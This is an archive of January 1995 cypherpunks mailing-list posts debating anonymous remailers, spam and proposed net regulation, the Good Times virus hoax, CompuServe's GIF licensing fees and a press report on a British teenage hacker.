Why is it that so many cypherpunks like the economist? I learned recently that Eric is a big fan. So am I. You're certainly not the first other cypherpunk to mention this. Weird. I mean, it's not exactly a radical publication... it just gets its *&#$*#$ facts right. Probably this is it.
...................................................

I like it for its classy, stylish prose. And the fact that it presents an economic perspective on world events.

..
Blanc

From jamesd at netcom.com Wed Jan 4 14:47:32 1995
From: jamesd at netcom.com (James A. Donald)
Date: Wed, 4 Jan 95 14:47:32 PST
Subject: Siegel and Lewis
In-Reply-To:
Message-ID:

On Wed, 4 Jan 1995, Jonathan Rochkind wrote:

> In a rather disjointed sort of way, that makes it easy to believe the
> article was mangled somewhat in editing. Perhaps they rearranged it to put
> the "sensational" fear-mongering stuff first. Which is unfortunate, and

One of the top points was "experts say ....". Journalists do not quote anonymous "experts" on controversial stuff unless they have marching orders from above. It is a violation of the standard rules of journalism. You are always supposed to identify the person allegedly speaking. "Experts say .." is like "Highly placed sources ...". You know an official lie issued by the appropriate department of lies is about going to follow when you see those words. This article was no accident of sloppy thinking and editing.

---------------------------------------------------------------------
We have the right to defend ourselves and our property, because of the kind of animals that we James A. Donald are. True law derives from this right, not from the arbitrary power of the omnipotent state. jamesd at netcom.com

From bshantz at spry.com Wed Jan 4 14:48:48 1995
From: bshantz at spry.com (bshantz at spry.com)
Date: Wed, 4 Jan 95 14:48:48 PST
Subject: The Good Times virus ...
Message-ID: <199501042250.OAA01990@homer.spry.com>

Hey folks,

Remember the AOL Good Times virus? Well, we just got some mail here at SPRY warning us about it. I laughed rather hard. Anyway, I told the guy who sent the mail that I would send him a number of pieces of documentation about the fact it's a hoax. There was a NASA newsletter a few months back about it. I deleted it, because I thought I'd never need it again. Does anyone know where I might get a copy of that or another press release about the Good Times hoax? I'd appreciate any help.
Thanks,
Brad

>>>>>>>>>>>>>>>>>>>>>INTERNETWORKING THE DESKTOP<<<<<<<<<<<<<<<<<<<<<<<
Brad Shantz bshantz at spry.com
Senior Software Engineer
SPRY Inc. Direct #: (206)-442-8251
Seattle, WA 98104 WWW URL: http://WWW.SPRY.COM
----------------------------------------------------------------------
PGP Public Key at: http://www-swiss.ai.mit.edu/~bal/pks-toplev.html
Or email: pgp-public-keys at pgp.ai.mit.edu Subj: GET bshantz
>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>><<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<

From cactus at seabsd.hks.net Wed Jan 4 15:07:09 1995
From: cactus at seabsd.hks.net (L. Todd Masco)
Date: Wed, 4 Jan 95 15:07:09 PST
Subject: Warning letter from Co$. [any comments ?]
Message-ID: <199501042312.SAA03816@bb.hks.net>

-----BEGIN PGP SIGNED MESSAGE-----
- -----BEGIN PGP SIGNED MESSAGE-----

In article <199501042047.PAA06797 at cutter.clas.ufl.edu>, Avi Harris Baumstein wrote:
>i know there has been much chatter on this subject, but are there
>truly any precedents that could hold on the anonymous distribution of
>copyrighted material? are remailer-ops truly in legal danger? what
>exactly constitutes a trade secret, and what sort of laws apply?

This is oddly timely. The LaMacchia decision showed that providing a service for others to use for the distribution of copyrighted material (in his case, copyrighted software) was not prosecutable under Wire Fraud statutes. The judge told the Feds, "no dice. Stop trying to apply laws to areas where they weren't intended."

Civil matters are another matter, of course, but that's one avenue that's closed.
- - --
Todd Masco | "life without caution/ the only worth living / love for a man/
cactus at hks.net | love for a woman/ love for the facts/ protectless" - A Rich
Cactus' Homepage

- -----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBLwrwjBNhgovrPB7dAQHIYAP6AtRFkIqOj+vRPxUPLdGaUK9t9/pZQi8g
6HyXHBjaEA9ygX8ALQEbS3AK1a1DsqWIsOxXVivszfEY+1lmS3w93VnICjigebbf
YuHpFOOgyf8IkUBslov1V7Pw0/X/blMVspyc1nDigK3KsyMi7PalAw5ECECqkhkD
AizVLOZNrO0=
=yOiL
- -----END PGP SIGNATURE-----
- ---
[This message has been signed by an auto-signing service. A valid signature means only that it has been received at the address corresponding to the signature and forwarded.]

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Gratis auto-signing service

iQBFAwUBLwsrTyoZzwIn1bdtAQH9xAF/dFkiStD+csfx4ATJ76WaxrfcLPEYej+p
Ec55BXkOYH+96xGLHugficY5hRjtL5eL
=LPEW
-----END PGP SIGNATURE-----

From meconlen at IntNet.net Wed Jan 4 15:17:09 1995
From: meconlen at IntNet.net (Michael Conlen)
Date: Wed, 4 Jan 95 15:17:09 PST
Subject: Siegel and Lewis
In-Reply-To:
Message-ID:

On Tue, 3 Jan 1995, Jonathan Cooper wrote:

> > Martha Siegel is just fucked up enough that she will probably push
> > for legislation regulating the nets. Congress is just fucked up that
> > they might pass it.
>
> And if they do I will make it a definite point to do all I can to
> emigrate to the UK, the Netherlands, or somewhere else.
>
> This country is increasingly becoming a police state, and I've got too
> many years of life left to just passively deal with it.

As I understand it, the government owns a portion of the internet. What they want to regulate about that is their business. What I want to know is how can they regulate what private business and citizens do with their Fiber Optics, ISDN lines, telephone lines, and computers. If the government was to ban anything on the net, it would surely seem to me to be in violation of the first amendment.
Things like pirated software, being illegal already, is one thing, but our mail, conversations, etc. is different. Does anyone have any information on what grounds Siegel and Lewis plan to use for legislation? If they do pass laws regulating the 'net I hope someone comes up with a no-spamming law, then I am getting a ticket on Jon Cooper's plane out of the country.

Groove on Dude
Michael Conlen

From db at Tadpole.COM Wed Jan 4 15:21:02 1995
From: db at Tadpole.COM (Doug Barnes)
Date: Wed, 4 Jan 95 15:21:02 PST
Subject: Remailer Abuse
In-Reply-To:
Message-ID: <9501042320.AA07624@tadpole.tadpole.com>

The problem with a _free_ remailer is obvious -- like many other Internet resources, it can suffer from the tragedy of the commons.

Even a negligible fee would do much to prevent gross remailer abuse. It may not be feasible to make remailers in to an industry, but this isn't the point -- it will keep the utterly lame from using it for pranks and their ilk.

From anonymous-remailer at shell.portal.com Wed Jan 4 15:24:17 1995
From: anonymous-remailer at shell.portal.com (anonymous-remailer at shell.portal.com)
Date: Wed, 4 Jan 95 15:24:17 PST
Subject: who?
Message-ID: <199501042324.PAA14631@jobe.shell.portal.com>

i'm sorry to hear the jpunix remailer is down for good-- why can't people learn to be more fuckin responsible! i guess this is just yet another inconvenience we can thank terrorists for and those aol-holes! anybody know the email address of the good samaritans? tia

From bshantz at spry.com Wed Jan 4 15:45:24 1995
From: bshantz at spry.com (bshantz at spry.com)
Date: Wed, 4 Jan 95 15:45:24 PST
Subject: The Good Times virus ...
Message-ID: <199501042346.PAA03355@homer.spry.com>

Thanks to the people who've sent me copies of the CIAC announcement. That should cover my needs for right now. Hopefully I can convince these people not to worry.

-- brad

From pstemari at erinet.com Wed Jan 4 16:11:42 1995
From: pstemari at erinet.com (Paul J. Ste.
Marie)
Date: Wed, 4 Jan 95 16:11:42 PST
Subject: British Hacker Article
Message-ID: <9501042343.AB19355@eri.erinet.com>

At 01:31 PM 1/4/95 -0500, Duncan Frissell wrote:
>>From The Independent (London) Tuesday 3 January 1995 - Front Page
> ... The US Defence Information
>Systems Agency admitted in a private briefing, which has been confirmed,
>that the hackers had affected the Department's "military readiness."

"Admitted"? Probably "complained without substantiation" would be more accurate.

> ... It is understood that
>he invented a "sniffer" programme which searched across hundreds of
>computers attached to the Internet for passwords and user names. ...

If he was really behind the various password sniffers running on Netcom, etc, he has a lot of explaining to do.

> ... "They contained information about
>firing sites in North Korea and stuff like that. Field intelligence. He
>kept detailed logs of communication traffic. ... The Korean files were on
>the Girths Air Force Base computer system and therefore they could have been
>accessed. ...

Harumpf. Either the stuff wasn't classified, or else someone had a major security procedures breach and had classified material sitting on a computer with an uncrypted comm link.

--Paul J. Ste. Marie
pstemari at well.sf.ca.us, pstemari at erinet.com

From entropy at IntNet.net Wed Jan 4 16:21:19 1995
From: entropy at IntNet.net (Jonathan Cooper)
Date: Wed, 4 Jan 95 16:21:19 PST
Subject: San Francisco Editorial
In-Reply-To:
Message-ID:

> A letter to the editor is like spitting into the wind in this case. I
> think what's needed is a more constructive affirmative action, ideally
> taking Cantor and Siegel to court somewhere.

Perhaps it's my libertarian outlook, perhaps not, but I tend to abhor using the US government's ``legal'' system for almost any reason.
The worst thing about doing this (suing them), IMHO, is that if you lost you would create a precedent for all the people who aren't doing it because they might consider it illegal or immoral -- far too many people consider things that the court okays to be morally okay.

Instead, I think it's a great stimulus for better software - there's no reason to sue them when it'd be a better thing for the community if newsreaders and mailreaders were enhanced to deal with spams.

-jon
( --------[ Jonathan D. Cooper ]--------[ entropy at intnet.net ]-------- )
( PGP 2.6.2 keyprint: 31 50 8F 82 B9 79 ED C4 5B 12 A0 35 E0 9B C0 01 )
( home page: http://taz.hyperreal.com/~entropy/ ]---[ Key-ID: 4082CCB5 )

From entropy at IntNet.net Wed Jan 4 16:27:25 1995
From: entropy at IntNet.net (Jonathan Cooper)
Date: Wed, 4 Jan 95 16:27:25 PST
Subject: Regulatory Risks
In-Reply-To:
Message-ID:

> Criminalize anonymity, and tell the internet providers to figure
> out how to enforce it or face confiscation.

Which would probably amount to sniffing all packet traffic.

If that ban was implemented, so would ways around it be implemented. I would prefer that they not need to be invented but if they must be, they will be.

-jon
( --------[ Jonathan D. Cooper ]--------[ entropy at intnet.net ]-------- )
( PGP 2.6.2 keyprint: 31 50 8F 82 B9 79 ED C4 5B 12 A0 35 E0 9B C0 01 )
( home page: http://taz.hyperreal.com/~entropy/ ]---[ Key-ID: 4082CCB5 )

From entropy at IntNet.net Wed Jan 4 16:29:09 1995
From: entropy at IntNet.net (Jonathan Cooper)
Date: Wed, 4 Jan 95 16:29:09 PST
Subject: Siegel and Lewis
In-Reply-To:
Message-ID:

> I tend to focus on the subject matter economist prints. I just find it
> more on target than most if not all of the major U.S. media sources.

I find _Reason_ quite excellent as well.

-jon
( --------[ Jonathan D.
Cooper ]--------[ entropy at intnet.net ]-------- )
( PGP 2.6.2 keyprint: 31 50 8F 82 B9 79 ED C4 5B 12 A0 35 E0 9B C0 01 )
( home page: http://taz.hyperreal.com/~entropy/ ]---[ Key-ID: 4082CCB5 )

From entropy at IntNet.net Wed Jan 4 16:37:41 1995
From: entropy at IntNet.net (Jonathan Cooper)
Date: Wed, 4 Jan 95 16:37:41 PST
Subject: Siegel and Lewis
In-Reply-To:
Message-ID:

> As I understand it, the government owns a portion of the internet. What

Yes. And through my work's upcoming link, so will they. So what?

> they want to regulate about that is their business. What I want to know

On their own networks, surely.

> is how can they regulate what private business and citizens do with
> their Fiber Optics, ISDN lines, telephone lines, and computers. If the

They already do - look at the regulations on telcos, power companies, water companies, cellular/paging companies, lawyers, doctors, etc.

> government was to ban anything on the net, it would surely seem to me to
> be in violation of the first amendment. Things like pirated software,

An interesting point. Any legal views from someone more versed in the law than I?

-jon
( --------[ Jonathan D. Cooper ]--------[ entropy at intnet.net ]-------- )
( PGP 2.6.2 keyprint: 31 50 8F 82 B9 79 ED C4 5B 12 A0 35 E0 9B C0 01 )
( home page: http://taz.hyperreal.com/~entropy/ ]---[ Key-ID: 4082CCB5 )

From entropy at IntNet.net Wed Jan 4 16:40:13 1995
From: entropy at IntNet.net (Jonathan Cooper)
Date: Wed, 4 Jan 95 16:40:13 PST
Subject: Remailer Abuse
In-Reply-To: <9501042320.AA07624@tadpole.tadpole.com>
Message-ID:

> The problem with a _free_ remailer is obvious -- like many
> other Internet resources, it can suffer from the tragedy of
> the commons.

See the remailer at c2.org as an example - quite nice, and has a pay-for-more than n bandwidth agreement. Works fine for a few small chatty messages, won't work worth a damn for spamming.

-jon
( --------[ Jonathan D.
Cooper ]--------[ entropy at intnet.net ]-------- )
( PGP 2.6.2 keyprint: 31 50 8F 82 B9 79 ED C4 5B 12 A0 35 E0 9B C0 01 )
( home page: http://taz.hyperreal.com/~entropy/ ]---[ Key-ID: 4082CCB5 )

From an172607 at anon.penet.fi Wed Jan 4 17:24:22 1995
From: an172607 at anon.penet.fi (duquesne duke)
Date: Wed, 4 Jan 95 17:24:22 PST
Subject: gif format in newsbytes
Message-ID: <9501050029.AA25564@anon.penet.fi>

CompuServe GIF License & Royalties Raises Hackles

COLUMBUS, OHIO, U.S.A., 1995 JAN 4 (NB) -- On-line giant CompuServe has sparked controversy on the Internet by offering a $1-plus-royalties license for developers to use its previously free GIF (Graphics Interchange Format) image file format. CompuServe terms the fee an offer and a benefit to the on-line community, but skeptics quickly dubbed it a "GIF tax."

The new fee system is based on a licensing agreement reached between CompuServe and Unisys Corp. (NYSE:UIS) in June, 1994, for use of LZW (Lempel-Ziv-Welch) compression in its GIF format. Unisys has claimed a patent on LZW technology.

Under the CompuServe agreement, developers who wish to operate under the on-line firm's LZW license agreement with Unisys pay a one-time fee of $1 plus a royalty of 1.5 percent or 15 cents per registered program, whichever is greater. Downloaded programs that do not get registered are not subject to the fee, nor are end-users.

CompuServe announced the new fee system in various areas or "forums" of the service on December 29. The timing has led to suspicions by some that the service was not being fully honest with its members.
In an open letter, Pat Clawson, president and chief executive officer (CEO) of TeleGrafix Communications Inc., called it "the online communications community's equivalent of the sneak attack at Pearl Harbor," and added: "The announcement of the CompuServe-Unisys GIF Tax on December 29, during the lull between Christmas and New Year's Day, was clearly timed to cause maximum damage while an unsuspecting public celebrated the holidays." Clawson said his firm, which developed the RIPscrip 2.0 online multimedia technology and the RIPTERM terminal program that leans heavily on the JPEG (Joint Photographic Experts Group) image format, will drop support of GIF images because of the new fee system. RIPscrip 2.0 is scheduled for release January 16. Speaking to Newsbytes, CompuServe spokesman Pierce Reid acknowledged that the release date may have been unfortunate from a public relations viewpoint, but he said it was an accident of timing, not a desire to avoid public scrutiny. Reid pointed out that it took a year and a half to hammer out a licensing agreement with Unisys Corp. (NYSE:UIS). Unisys holds a patent on the GIF format's underlying LZW compression technology. Once the agreement with Unisys was signed in June, 1994, he added, it took CompuServe another six months to arrive at a way to, as he put it, "share" the license. "Six months is not a long time to settle the details of a licensing agreement, if you know how these things work," he told Newsbytes. "We're not making any money on this. We paid a substantial fee to Unisys for the license, and we offered to share the license for the benefit of the development community as well as for ourselves and our subscribers." Reid said the license was based on the fact that CompuServe had found merit in a Unisys patent claim. CompuServe had used the patented LZW technology in its 1987 development of the GIF format, believing the technology to be in the public domain. 
Unisys contacted the on-line firm about its patent claim in 1993, and that eventually led to the December 29 announcement, the firm said.

Commented Reid: "I've been watching the Internet, and those who are commenting are on a bell curve -- the vast majority are taking a reasonable view, but there are always those out on the extreme ends.

"A number of people regard this as a real benefit. CompuServe, by requiring no money for negotiations, is saving developers from the need to waste time. There's no worrying about legal or licensing issues, and we've done that for a dollar."

(Craig Menefee/19950104/Press Contact: Pierce Reid, CompuServe, 614-538-4571; Pat Clawson, TeleGrafix, 714-379-2140, Internet e-mail rip.support at telegrafix.com; Oliver Picher, Unisys, 215-986-5367)

Unisys Seeks Royalties On GIF Algorithm

BLUE BELL, PENNSYLVANIA, U.S.A., 1995 JAN 4 (NB) -- Unisys Corp. (NYSE:UIS) said it will seek royalty payments from developers of software using the Graphic Interchange Format (GIF). Unisys said it owns rights to an algorithm that is widely used in GIF tools.

Oliver Picher, a spokesman for Unisys, told Newsbytes that the online service CompuServe introduced the GIF format in 1987, and incorporated the Unisys algorithm, apparently believing it was in the public domain.

Unisys learned that the algorithm was used in the GIF technology about two years ago, contacted CompuServe, and in June, 1994, the companies reached an agreement under which CompuServe paid Unisys an undisclosed sum for use of the algorithm. The payment was "a reasonable amount but not an overwhelming amount," Picher said, declining to reveal the exact sum.

CompuServe was the first to license the algorithm from Unisys for use in a GIF tool, Picher said, but about 100 companies have licensed it for other purposes. Picher said one other online information service has already licensed the algorithm, but could not say if it was for GIF-related use in that case.
Unisys is negotiating with all the major online services for possible license agreements, Picher said. While he would not give specifics, he said the terms Unisys is seeking are "very reasonable to the point where license fees shouldn't be a barrier" to using GIF. He added that people who have GIF software on their PCs will not be affected.

The same algorithm is also used in the Tagged Image File Format (TIFF) graphics format, and Unisys concluded a license agreement with Aldus Corp. some time ago, Picher said.

(Grant Buckler/19950104/Press Contact: Oliver Picher, Unisys, 215-986-5367)

-------------------------------------------------------------------------
To find out more about the anon service, send mail to help at anon.penet.fi. Due to the double-blind, any mail replies to this message will be anonymized, and an anonymous id will be allocated automatically. You have been warned. Please report any problems, inappropriate use etc. to admin at anon.penet.fi.

From tcmay at netcom.com Wed Jan 4 17:30:07 1995
From: tcmay at netcom.com (Timothy C. May)
Date: Wed, 4 Jan 95 17:30:07 PST
Subject: Outlawing Anonymity
In-Reply-To:
Message-ID: <199501050126.RAA01575@netcom12.netcom.com>

Jonathan Cooper wrote:
>
> > Criminalize anonymity, and tell the internet providers to figure
> > out how to enforce it or face confiscation.
>
> Which would probably amount to sniffing all packet traffic.
>
> If that ban was implemented, so would ways around it be implemented.
> I would prefer that they not need to be invented but if they must be,
> they will be.

This same topic--the outlawing of anonymity and anonymous remailers--is also being debated on the Cyberia list, as many of you know. (Timely, I guess, because of the Siegel comments, the Lewis article, and the Church of Scientology threats.)

The ways around such a ban are so patently obvious that any such "ban" is unenforceable.
I wrote a piece on this for the Cyberia list, but this was my single most important point:

If anonymous mail is outlawed, then the anonymous mailers can attach real names. To wit, all mail from a famous remailing site in the Netherlands could be marked as being from "Hans Brinker."

This would presumably meet the letter of the law, if not the "spirit." (I always did hate this "spirit.")

Further, sites which "forward" anonymous mail, or mail from "Hans Brinker," are in most cases precluded by the ECPA from screening this mail or otherwise examining it.

I see no prospect whatsoever that a ban on anonymous mail could be implemented, enforced, or upheld in the courts.

--Tim May

--
..........................................................................
Timothy C. May         | Crypto Anarchy: encryption, digital money,
tcmay at netcom.com    | anonymous networks, digital pseudonyms, zero
408-688-5409           | knowledge, reputations, information markets,
W.A.S.T.E.: Aptos, CA  | black markets, collapse of governments.
Higher Power: 2^859433 | Public Key: PGP and MailSafe available.
Cypherpunks list: majordomo at toad.com with body message of only:
subscribe cypherpunks. FAQ available at ftp.netcom.com in pub/tc/tcmay

From nelson at crynwr.com Wed Jan 4 17:31:32 1995
From: nelson at crynwr.com (Russell Nelson)
Date: Wed, 4 Jan 95 17:31:32 PST
Subject: Remailer Abuse
In-Reply-To: <9501042320.AA07624@tadpole.tadpole.com>
Message-ID:

   From: db at Tadpole.COM (Doug Barnes)
   Date: Wed, 4 Jan 1995 16:38:21 -0600 (CST)
   Cc: cypherpunks at toad.com

   The problem with a _free_ remailer is obvious -- like many other Internet resources, it can suffer from the tragedy of the commons.

   Even a negligible fee would do much to prevent gross remailer abuse. It may not be feasible to make remailers in to an industry, but this isn't the point -- it will keep the utterly lame from using it for pranks and their ilk.

Use First Virtual.
The "information" that you sell is a one-time email alias that points to your remailer. After an hour, that email alias gets disabled. This dynamic setup is easy to do with smail, just a matter of dropping a file into a directory.

And who cares if they pay you or not, because if they don't pay (choose to purchase the information), eventually FV will cancel their account.

Send mail to info at fv.com. This gets you an automated response. Their contract says that they won't enforce payment on services, so if you offer a service, you're completely at risk, but again, there's not much real risk here...

--
-russ http://www.crynwr.com/crynwr/nelson.html
Crynwr Software   | Crynwr Software sells packet driver support | ask4 PGP key
11 Grant St.      | +1 315 268 1925 (9201 FAX)    | What is thee doing about it?
Potsdam, NY 13676 | What part of "Congress shall make no law" eludes Congress?

From jrochkin at cs.oberlin.edu Wed Jan 4 17:37:07 1995
From: jrochkin at cs.oberlin.edu (Jonathan Rochkind)
Date: Wed, 4 Jan 95 17:37:07 PST
Subject: good news about the EFF...
Message-ID:

At 11:23 PM 01/01/95, Aron Freed wrote:
>Has anyone seen Monty Python's Life of Brian..... DO I hear a parallelism???
>Something to the effect of "The People's Judean Front", "The Popular
>People's Front", and it goes on and on....
>
>How about for the modern approach.... CDT, EFF, CPSR, Cypherpunks... Do I
>hear more.. Or are we so split up that we can't agree on our common goal....

The more the merrier, in my opinion. As long as they can all get funding, which admittedly could be a problem, but presumably if it is then some of the organizations will just drop out. *shrug* But in general, decentralization is good, right? I'd rather have 5 organizations defending electronic rights than just one, when we know all too well how possible it is for that just one to negotiate a compromise that seems more like a betrayal.
The more active, funded organizations, the more it appears to legislators like people are really concerned about this stuff, and the safer we are against point-failure. Decentralize, distribute, good. :)

[Of course it remains to be seen if so many organizations at once can remain active and well funded.]

From nobody at replay.com Wed Jan 4 18:35:29 1995
From: nobody at replay.com (Name withheld on request)
Date: Wed, 4 Jan 95 18:35:29 PST
Subject: British Hacker Story
Message-ID: <199501050236.AA22300@xs1.xs4all.nl>

From: newsbytes at clarinet.com (NB-LON)
Subject: London Newspaper Runs Old "Superhacker" Story 01/03/95
Date: 3 Jan 95 20:44:22 GMT

LONDON, ENGLAND, 1995 JAN 3 (NB) -- As the UK started back to work today after the long Christmas and New Year shutdown, readers of the Independent newspaper were treated to the banner headline "British Boy Raided US Defense Secrets."

The curious thing about the story was that none of the other national papers or news wires carried any reports. On investigation, Newsbytes discovered why -- the story dates back to July of last year, and briefly resurfaced in early November on the US news wires.

According to the Independent, a 16-year-old British boy has been arrested in connection with alleged unauthorized intrusions into the US government's computers and "was able to watch secret communications between US agents in North Korea during the crisis over nuclear inspections last spring."

The story is quite correct, except that the boy in question was arrested last July, when the original story broke.

Commenting on the story, Peter Sommer, a leading security consultant and a senior with the Computer Research Center at the London School of Economics, said that it smacked of the British Telecom secrets case of late November, also reported in the Independent.
That story, as reported by Newsbytes, turned out to be something of a non-event when the hacker, who posted details of top secret files on BT's ex-directory computer "across the Internet," turned out to be Steve Fleming, a Scottish freelance journalist who worked as a temp for BT in the summer and broke BT's own security rules by downloading files from the BT's Customer Service System (CSS) computer, then mailed them -- across the Internet -- to other people. "I'm amazed at the Independent running yet another story involving the Internet," Sommer told Newsbytes, adding that it is "a very old story. It seems that all they have to do is to work up a story about a hacking attempt, whether successful or not, and weave in a story about the Internet, and it's a headline story." Ken Young, newly installed editor of Communicate, a leading industry communications magazine in London, and a veteran of the UK communications industry for more than a decade, told Newsbytes that the story seemed a little thin. "It looks like another hacking story except that (the newspaper) has written in something about the Internet, and bingo! You've got a report that the information was accessible to 32 million users on the Internet," he said. Sommer, meanwhile, told Newsbytes that he had made his own discreet inquiries about the story with high level authorities when it broke last summer. "There are two problems with this case. Firstly, any lawyer worth his salt would invoke Section 69 of the Police & Criminal Evidence Act," he said. This Act, Sommer explained, requires that, before a computer can be considered as admissible evidence in court, the owner of the computer must issue a certificate of correct working. This, he said, could not be issued, as a casual user of a PC would be unable to make such a certification. 
Sommer went on to explain that the second reason that the case could be problematic for the prosecution was "that the lawyer would ask the court for full disclosure of all affected files on victim's host computers," which, since such files are almost certain to be classified in the US, could not be revealed in a British courtroom.

The facts surrounding the case, as reported by Newsbytes, were that the 16-year-old -- operating under the code name of Data Stream -- was one of several who gained unauthorized access to the US defense computer network in late 1993 and early 1994 and that some files were deleted.

At the time, press reports said that as many as a million passwords were compromised, and may have compromised the military readiness of the United States.

The case has, Newsbytes understands, been fully investigated by the US Air Force Office of Special Investigations (OSI) although details of the report of the investigation by the USAF OSI are classified.

Originally, the press reports of the time speculated whether the youth would be the first under-18 to be extradited to the US to face charges. It seems that, following last summer's arrest and submission of the report to the Crown Prosecution Service that the case is being quietly shuffled into a file because of the practical problems in pursuing a prosecution.

From nelson at crynwr.com Wed Jan 4 19:11:15 1995
From: nelson at crynwr.com (Russell Nelson)
Date: Wed, 4 Jan 95 19:11:15 PST
Subject: The NYTimes article
Message-ID:

The New York Times article is on Nando (News and Observer)'s WWW server:

http://www.nando.net/newsroom/nt/inf/01029537644.html

For those who haven't seen it...

--
-russ http://www.crynwr.com/crynwr/nelson.html
Crynwr Software   | Crynwr Software sells packet driver support | ask4 PGP key
11 Grant St.      | +1 315 268 1925 (9201 FAX)    | What is thee doing about it?
Potsdam, NY 13676 | What part of "Congress shall make no law" eludes Congress?
From s009amf at discover.wright.edu Wed Jan 4 20:30:14 1995
From: s009amf at discover.wright.edu (Aron Freed)
Date: Wed, 4 Jan 95 20:30:14 PST
Subject: good news about the EFF...
In-Reply-To:
Message-ID:

On Wed, 4 Jan 1995, Jonathan Rochkind wrote:

> which admittedly could be a problem, but presumably if it is then some of
> the organizations will just drop out. *shrug* But in general,
> decentralization is good, right? I'd rather have 5 organizations defending
> electronic rights than just one, when we know all too well how possible it
> is for that just one to negotiate a compromise that seems more like a
> betrayal. The more active, funded organizations, the more it appears to
> legislators like people are really concerned about this stuff, and the
> safer we are against point-failure. Decentralize, distribute, good. :)
>
> [Of course it remains to be seen if so many organizations at once can
> remain active and well funded.]

A good point, but I was just trying to make the point of too many organizations becomes very silly.... But thanks for pointing out the other extreme...

| A(a)ron M. Freed | It is naive to believe people are honest. |
| s009amf at discover.wright.edu | It is naive to believe programmers are |
| (513)276-3817 (voice) | honest. It is even more naive to believe |
| (513)276-4158 (data/fax) | the government is honest. Down with Big |
| | Brother. |
|_____________________________|___________________________________________|

From db at Tadpole.COM Wed Jan 4 20:52:46 1995
From: db at Tadpole.COM (Doug Barnes)
Date: Wed, 4 Jan 95 20:52:46 PST
Subject: Remailer Abuse
In-Reply-To:
Message-ID: <9501050453.AA10198@tadpole.tadpole.com>

> The problem with a _free_ remailer is obvious -- like many
> other Internet resources, it can suffer from the tragedy of
> the commons.
>
> Even a negligible fee would do much to prevent gross remailer
> abuse.
It may not be feasible to make remailers into an > industry, but this isn't the point -- it will keep the utterly > lame from using it for pranks and their ilk. > > Use First Virtual. The "information" that you sell is a one-time > email alias that points to your remailer. After an hour, that email > alias gets disabled. This dynamic setup is easy to do with smail, > just a matter of dropping a file into a directory. Heh. An anonymous remailer paid for by credit card... there'd have to be an additional level of indirection for it to work, which would make the methods for tracking those who don't pay quite problematic. Also, most remailer abuse tends to be of the hit-and-run variety, which is still nicely enabled by FV. Anonymous remailers pretty much require anonymous digital cash, although this could be built on top of some other electronic payment system with somewhat less payment lag and reversibility than FV. Doug From db at Tadpole.COM Wed Jan 4 20:58:12 1995 From: db at Tadpole.COM (Doug Barnes) Date: Wed, 4 Jan 95 20:58:12 PST Subject: Remailer Abuse In-Reply-To: Message-ID: <9501050458.AA10237@tadpole.tadpole.com> > See the remailer at c2.org as an example - quite nice, and has a > pay-for-more than n bandwidth agreement. Works fine for a few small > chatty messages, won't work worth a damn for spamming. > I like both this idea and this particular service. I didn't mean to imply that nobody was charging/reducing spam. From lmccarth at ducie.cs.umass.edu Wed Jan 4 20:58:24 1995 From: lmccarth at ducie.cs.umass.edu (L. McCarthy) Date: Wed, 4 Jan 95 20:58:24 PST Subject: Anonymous payment scheme Message-ID: <199501050503.AAA07022@bb.hks.net> -----BEGIN PGP SIGNED MESSAGE----- - -----BEGIN PGP SIGNED MESSAGE----- The Dalai Lama writes: > I know that in Delaware it is illegal for a merchant to request ID when > you pay by credit card. I'm not sure if this is wide spread or just > local. 
As I recall there was something of a national outcry about this practice several years back. I think California outlawed it at the time, along with other states, though I don't know if any federal law was passed. Since I understand MBNA America is the second-largest employer in Delaware, I'd guess that if Delaware banned it, so did most states. Retail stores often asked one to write one's phone number on the check when paying that way. I remember my father habitually writing the police dept.'s non-emergency number in all such cases :] > -- [Here's something for those friendly mail scanners...] > [...] LSD-25 plutonium north korea terrorist encryption die NSA CERT quiche "quiche" ? The *real* Four Horsemen don't eat quiche ! -L. Futplex McCarthy; PGP key by finger or server "The objective is for us to get those conversations whether they're by an alligator clip or ones and zeroes. Wherever they are, whatever they are, I need them." -FBI Dir. Freeh - -----BEGIN PGP SIGNATURE----- Version: 2.6.1 - -----END PGP SIGNATURE----- - --- [This message has been signed by an auto-signing service. A valid signature means only that it has been received at the address corresponding to the signature and forwarded.] -----BEGIN PGP SIGNATURE----- Version: 2.6.2 Comment: Gratis auto-signing service -----END PGP SIGNATURE----- From eric at remailer.net Thu Jan 5 00:02:06 1995 From: eric at remailer.net (Eric Hughes) Date: Thu, 5 Jan 95 00:02:06 PST Subject: Warning letter from Co$. [any comments ?] 
In-Reply-To: <199501042047.PAA06797@cutter.clas.ufl.edu> Message-ID: <199501050801.AAA18013@largo.remailer.net> From: Avi Harris Baumstein i know there has been much chatter on this subject, but are there truly any precedents that could hold on the anonymous distribution of copyrighted material? Cubby v. Compuserve is relevant here, as well as that bookstore case in the 50's that I never remember the name of. Mike G., can you help me out on this one? These cases are about other kinds of wrongs (libel in one and obscenity (?) in the other), but copyright violation doesn't seem to have any particular features to set it apart from the basic principle of these. Namely, if you know, you're responsible; if you don't, you're not. This, you all realize no doubt, is a gross simplification of a long chain of reasoning. what exactly constitutes a trade secret, and what sort of laws apply? The short answer is that if you didn't sign a trade secret agreement or are party to one by some other relationship (such as agency), then a trade secret that comes your way is no secret any more. > clients' property rights. Courts are holding such > contributory infringers liable. Two examples are: Sega > Enterprises Ltd. v. Maphia BBS, 30 U.S.P.Q. 2d 1921 (N.D. > Cal. 1994) and Playboy Enterprises v. Frena, 839 F. Supp. > 1152 (M.D. Fla. 1993). what of these cases? is this just an example of typical lawyerly intimidation tactics? I have personal experience with the first case. It was a local BBS run by a friend of a friend, and I got involved a year ago right after the seizure. (It was, BTW, a _civil_ seizure of a BBS, not criminal.) I believe the case settled out of court. There were court documents approving the seizure however; I don't know if these set precedent or not. I suspect not, because the action was entirely _ex parte_ (Latin for one-sided). Mike, again? Other legal folk? I know nothing about the second one. nhow do you remailer-ops plan to react? 
